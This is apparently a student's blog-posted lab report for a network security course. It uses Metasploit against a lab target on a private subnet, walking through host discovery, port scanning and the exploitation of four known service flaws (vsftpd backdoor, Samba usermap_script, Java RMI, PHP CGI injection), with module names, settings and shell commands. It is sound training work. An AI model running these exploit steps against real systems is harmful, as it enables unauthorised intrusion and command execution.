20222306 2024-2025-1《网络与系统攻防技术》实验六实验报告

1.实验内容

1.1内容回顾总结

这周都重点在于Metasploit工具的使用,我深入了解了对其功能和使用流程。Metasploit 是一个功能强大的渗透测试框架,广泛应用于网络安全领域。它为安全专家、渗透测试人员和红队提供了一个全面的工具集,支持漏洞利用、攻击模拟和安全评估。Metasploit 提供了丰富的攻击模块,涵盖了远程代码执行、服务拒绝、提权等多种攻击方式,支持对多种操作系统和应用程序进行测试。

1.2实验内容

(1)前期渗透

主机IP:192.168.80.139
靶机IP:192.168.80.157

  • 主机发现

  • 端口扫描

  • 扫描系统版本,漏洞等

(2) Vsftpd源码包后门漏洞(21端口)

(3) SambaMS-RPC Shell命令注入漏洞(端口139)

(4)Java RMI SERVER命令执行漏洞(1099端口)

(5) PHP CGI参数执行注入漏洞(80端口)

2.实验过程

2.1前期渗透

2.1.1主机发现

首先使用root权限登入,启用msfconsole控制台

搜索漏洞库

search arp_sweep
use 0

查看所需参数
show options

设置靶机IPset rhosts 192.168.80.157之后运行run

扫描到了靶机.

2.1.2 端口扫描

利用Aux中的portscan/tcp,search portscan/tcpuse 0show options

设置目的端口、靶机IP等参数后运行

扫描到了0-65535中的以下端口

2.1.3扫描目标HTTP服务器的HTTP版本信息

use auxiliary/scanner/http/http_version
show missing
set RHOST 192.168.80.157
run

2.2 Vsftpd源码包后门漏洞(21端口)

漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

在kali中执行msfconsole 启动metasploit
use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞
set RHOST 192.168.80.157(靶机IP)

run开始攻击,利用成功,执行uname –a、 pwd、 id等命令 验证

2.3 SambaMS-RPC Shell命令注入漏洞(端口139)

漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

use exploit/multi/samba/usermap_script 选择漏洞

set RHOST 192.168.80.157(靶机IP)

exploit 开始攻击,执行uname–a验证

2.4 Java RMI SERVER命令执行漏洞(1099端口)

漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

根据前期扫描结果,靶机1099端口是开放的

然后在MSF中:

use exploit/multi/misc/java_rmi_server

show missing 查看缺少的参数

set RHOST 192.168.80.157(靶机IP)

exploit/run

运行成功

sessions -i 1进如任务

shell

利用whoami验证下

2.5、PHP CGI参数执行注入漏洞(80端口)

漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

根据前期扫描结果可知,靶机80端口是开放的

use exploit/multi/http/php_cgi_arg_injection 选择漏洞

设置IP参数set RHOST 192.168.80.157(靶机IP)

exploit/run 开始攻击,进入shell后输入ls查看文件

3.问题及解决方案

本次实验没有遇到问题。

4.学习感悟、思考等

通过Metasploit渗透测试作业,加上这次实验,让我对这个工具有了更加深入的了解,以及使用方面也更加流畅。其大体上可以分为一下几步:

  1. 进入msf控制台

  2. 查找对应漏洞相关信息

  3. 选择加载想用的模块

  4. 设置需要的参数

  5. exploit/run执行

总体来说实验过程以及原理很好理解,通过本次实验我对msf的使用更加熟练,对于这些漏洞及其复现有了更深层的理解和体会。这次实验也让我意识到在互联网上我们需要格外注重自己的隐私,只有我们真正接触到了之后才发现保护隐私的重要性!

posted @ 2024-11-16 20:58  20222306  阅读(18)  评论(0编辑  收藏  举报